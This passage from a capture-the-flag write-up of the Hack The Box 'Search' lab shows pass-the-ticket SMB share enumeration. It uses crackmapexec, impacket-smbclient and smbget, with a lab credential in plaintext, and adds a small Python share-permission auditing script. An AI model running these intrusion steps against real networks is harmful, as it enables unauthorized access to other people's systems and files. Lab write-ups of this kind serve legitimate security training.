hope.sharp Session
Checking the SMB access level of the hope.sharp user
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=hope.sharp@research.search.htb.ccache crackmapexec smb research.search.htb -k --use-kcache --kdcHost research.search.htb --shares
SMB research.search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB research.search.htb 445 RESEARCH [+] search.htb\ from ccache
SMB research.search.htb 445 RESEARCH [+] Enumerated shares
SMB research.search.htb 445 RESEARCH Share Permissions Remark
SMB research.search.htb 445 RESEARCH ----- ----------- ------
SMB research.search.htb 445 RESEARCH ADMIN$ Remote Admin
SMB research.search.htb 445 RESEARCH C$ Default share
SMB research.search.htb 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB research.search.htb 445 RESEARCH helpdesk
SMB research.search.htb 445 RESEARCH IPC$ READ Remote IPC
SMB research.search.htb 445 RESEARCH NETLOGON READ Logon server share
SMB research.search.htb 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB research.search.htb 445 RESEARCH SYSVOL READ Logon server share
Using the pass-the-ticket technique with the TGT of the hope.sharp user, I can finally access the SMB server.
While there are several interesting shares available, the user has access to 2 non-default shares:
//research.search.htb/CertEnroll: read
//research.search.htb/RedirectedFolders$: read, write
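An added example (not part of the original write-up): a small parser for the share table above that lists the non-default shares an account can reach, writable ones first, as you would when auditing share exposure. The `DEFAULT_SHARES` set and the assumption that share names contain no spaces belong to this example.

```python
import re

# Shares Windows creates by default on a domain controller (assumption of this example).
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL", "PRINT$"}
PERM_RE = re.compile(r"^(READ|WRITE)(,(READ|WRITE))*$")

# Share rows copied from the enumeration output above.
SAMPLE = """\
SMB research.search.htb 445 RESEARCH Share Permissions Remark
SMB research.search.htb 445 RESEARCH ----- ----------- ------
SMB research.search.htb 445 RESEARCH ADMIN$ Remote Admin
SMB research.search.htb 445 RESEARCH C$ Default share
SMB research.search.htb 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB research.search.htb 445 RESEARCH helpdesk
SMB research.search.htb 445 RESEARCH IPC$ READ Remote IPC
SMB research.search.htb 445 RESEARCH NETLOGON READ Logon server share
SMB research.search.htb 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB research.search.htb 445 RESEARCH SYSVOL READ Logon server share
"""

def parse_shares(text):
    """Return {share: set of permissions} from whitespace-separated share rows."""
    shares, in_table = {}, False
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0].upper() != "SMB":
            continue
        rest = fields[4:]  # drop protocol, host, port, NetBIOS name
        if rest[:2] == ["Share", "Permissions"]:
            in_table = True  # rows after the header are share entries
            continue
        if not in_table or set(rest[0]) == {"-"}:
            continue
        perms = set()
        # The permissions column is optional; a remark may follow the name directly.
        if len(rest) > 1 and PERM_RE.match(rest[1]):
            perms = set(rest[1].split(","))
        shares[rest[0]] = perms
    return shares

def review(shares):
    """Non-default shares the account can reach, writable ones first."""
    hits = [(n, sorted(p)) for n, p in shares.items()
            if p and n.upper() not in DEFAULT_SHARES]
    return sorted(hits, key=lambda h: ("WRITE" not in h[1], h[0].lower()))

if __name__ == "__main__":
    for name, perms in review(parse_shares(SAMPLE)):
        print(f"{name}: {', '.join(perms)}")
```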
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=hope.sharp@research.search.htb.ccache impacket-smbclient SEARCH.HTB/@research.search.htb -k -no-pass -dc-ip $IP
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
Type help for list of commands
#
Connected
//research.search.htb/CertEnroll Share
# use CertEnroll
# ls
drw-rw-rw- 0 Tue Jan 30 10:08:11 2024 .
drw-rw-rw- 0 Tue Jan 30 10:08:11 2024 ..
-rw-rw-rw- 330 Tue Apr 7 09:29:31 2020 nsrev_search-RESEARCH-CA.asp
-rw-rw-rw- 883 Tue Apr 7 09:29:29 2020 Research.search.htb_search-RESEARCH-CA.crt
-rw-rw-rw- 735 Tue Jan 30 10:08:11 2024 search-RESEARCH-CA+.crl
-rw-rw-rw- 931 Tue Jan 30 10:08:09 2024 search-RESEARCH-CA.crl
The presence of the //research.search.htb/CertEnroll share is indeed expected, given the discovery of relevant web endpoints earlier.
┌──(kali㉿kali)-[~/…/labs/search/smb/CertEnroll]
└─$ smbget -e --recursive smb://research.search.htb/CertEnroll/ -U 'SEARCH.HTB/hope.sharp%IsolationIsKey?'
Using domain: SEARCH.HTB, user: hope.sharp
smb://research.search.htb/CertEnroll//nsrev_search-RESEARCH-CA.asp
smb://research.search.htb/CertEnroll//Research.search.htb_search-RESEARCH-CA.crt
smb://research.search.htb/CertEnroll//search-RESEARCH-CA+.crl
smb://research.search.htb/CertEnroll//search-RESEARCH-CA.crl
Downloaded 2.81kB in 2 seconds
Downloading them to Kali for further analysis
//research.search.htb/RedirectedFolders$ Share
# use RedirectedFolders$
# ls
drw-rw-rw- 0 Tue Jan 30 15:09:29 2024 .
drw-rw-rw- 0 Tue Jan 30 15:09:29 2024 ..
drw-rw-rw- 0 Tue Apr 7 20:12:58 2020 abril.suarez
drw-rw-rw- 0 Fri Jul 31 15:11:32 2020 Angie.Duffy
drw-rw-rw- 0 Fri Jul 31 14:35:32 2020 Antony.Russo
drw-rw-rw- 0 Tue Apr 7 20:32:31 2020 belen.compton
drw-rw-rw- 0 Fri Jul 31 14:37:36 2020 Cameron.Melendez
drw-rw-rw- 0 Tue Apr 7 20:15:09 2020 chanel.bell
drw-rw-rw- 0 Fri Jul 31 15:09:07 2020 Claudia.Pugh
drw-rw-rw- 0 Fri Jul 31 14:02:04 2020 Cortez.Hickman
drw-rw-rw- 0 Tue Apr 7 20:20:08 2020 dax.santiago
drw-rw-rw- 0 Fri Jul 31 13:55:34 2020 Eddie.Stevens
drw-rw-rw- 0 Thu Apr 9 22:04:11 2020 edgar.jacobs
drw-rw-rw- 0 Fri Jul 31 14:39:50 2020 Edith.Walls
drw-rw-rw- 0 Tue Apr 7 20:23:13 2020 eve.galvan
drw-rw-rw- 0 Tue Apr 7 20:29:22 2020 frederick.cuevas
drw-rw-rw- 0 Thu Apr 9 16:34:41 2020 hope.sharp
drw-rw-rw- 0 Tue Apr 7 20:07:00 2020 jayla.roberts
drw-rw-rw- 0 Fri Jul 31 15:01:06 2020 Jordan.Gregory
drw-rw-rw- 0 Thu Apr 9 22:11:39 2020 payton.harmon
drw-rw-rw- 0 Fri Jul 31 13:44:32 2020 Reginald.Morton
drw-rw-rw- 0 Tue Apr 7 20:10:25 2020 santino.benjamin
drw-rw-rw- 0 Fri Jul 31 14:21:42 2020 Savanah.Velazquez
drw-rw-rw- 0 Thu Nov 18 02:01:45 2021 sierra.frye
drw-rw-rw- 0 Thu Apr 9 22:14:26 2020 trace.ryan
The //research.search.htb/RedirectedFolders$ share appears to be mapped to the C:\Users directory, listing all the home directories of users.
# tree .
/abril.suarez/Desktop
/abril.suarez/Documents
/abril.suarez/Downloads
/Angie.Duffy/Desktop
/Angie.Duffy/Documents
/Angie.Duffy/Downloads
/Antony.Russo/Desktop
/Antony.Russo/Documents
/Antony.Russo/Downloads
/belen.compton/Desktop
/belen.compton/Documents
/belen.compton/Downloads
/Cameron.Melendez/Desktop
/Cameron.Melendez/Documents
/Cameron.Melendez/Downloads
/chanel.bell/Desktop
/chanel.bell/Documents
/chanel.bell/Downloads
/Claudia.Pugh/Desktop
/Claudia.Pugh/Documents
/Claudia.Pugh/Downloads
/Cortez.Hickman/Desktop
/Cortez.Hickman/Documents
/Cortez.Hickman/Downloads
/dax.santiago/Desktop
/dax.santiago/Documents
/dax.santiago/Downloads
/Eddie.Stevens/Desktop
/Eddie.Stevens/Documents
/Eddie.Stevens/Downloads
/edgar.jacobs/Desktop
/edgar.jacobs/Documents
/edgar.jacobs/Downloads
/Edith.Walls/Desktop
/Edith.Walls/Documents
/Edith.Walls/Downloads
/eve.galvan/Desktop
/eve.galvan/Documents
/eve.galvan/Downloads
/frederick.cuevas/Desktop
/frederick.cuevas/Documents
/frederick.cuevas/Downloads
/hope.sharp/Desktop
/hope.sharp/Documents
/hope.sharp/Downloads
/jayla.roberts/Desktop
/jayla.roberts/Documents
/jayla.roberts/Downloads
/Jordan.Gregory/Desktop
/Jordan.Gregory/Documents
/Jordan.Gregory/Downloads
/payton.harmon/Desktop
/payton.harmon/Documents
/payton.harmon/Downloads
/Reginald.Morton/Desktop
/Reginald.Morton/Documents
/Reginald.Morton/Downloads
/santino.benjamin/Desktop
/santino.benjamin/Documents
/santino.benjamin/Downloads
/Savanah.Velazquez/Desktop
/Savanah.Velazquez/Documents
/Savanah.Velazquez/Downloads
/sierra.frye/Desktop
/sierra.frye/Documents
/sierra.frye/Downloads
/sierra.frye/user.txt
/trace.ryan/Desktop
/trace.ryan/Documents
/trace.ryan/Downloads
/hope.sharp/Desktop/$RECYCLE.BIN/desktop.ini
/hope.sharp/Documents/$RECYCLE.BIN/desktop.ini
/hope.sharp/Downloads/$RECYCLE.BIN/desktop.ini
/hope.sharp/Desktop/$RECYCLE.BIN
/hope.sharp/Desktop/desktop.ini
/hope.sharp/Desktop/Microsoft Edge.lnk
/hope.sharp/Documents/$RECYCLE.BIN
/hope.sharp/Documents/desktop.ini
/hope.sharp/Downloads/$RECYCLE.BIN
/hope.sharp/Downloads/desktop.ini
/sierra.frye/Desktop/$RECYCLE.BIN
/sierra.frye/Desktop/desktop.ini
/sierra.frye/Desktop/Microsoft Edge.lnk
/sierra.frye/Desktop/user.txt
/sierra.frye/Desktop/$RECYCLE.BIN/desktop.ini
Finished - 108 files and folders
It would appear that the current user is able to access the %USERPROFILE%/Desktop directory of the sierra.frye user as well.
# cd sierra.frye
# cat user.txt
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
However, the hope.sharp user is unable to read the user.txt in the home directory of the sierra.frye user.
It’s likely that the file itself is configured to be readable only by its owner.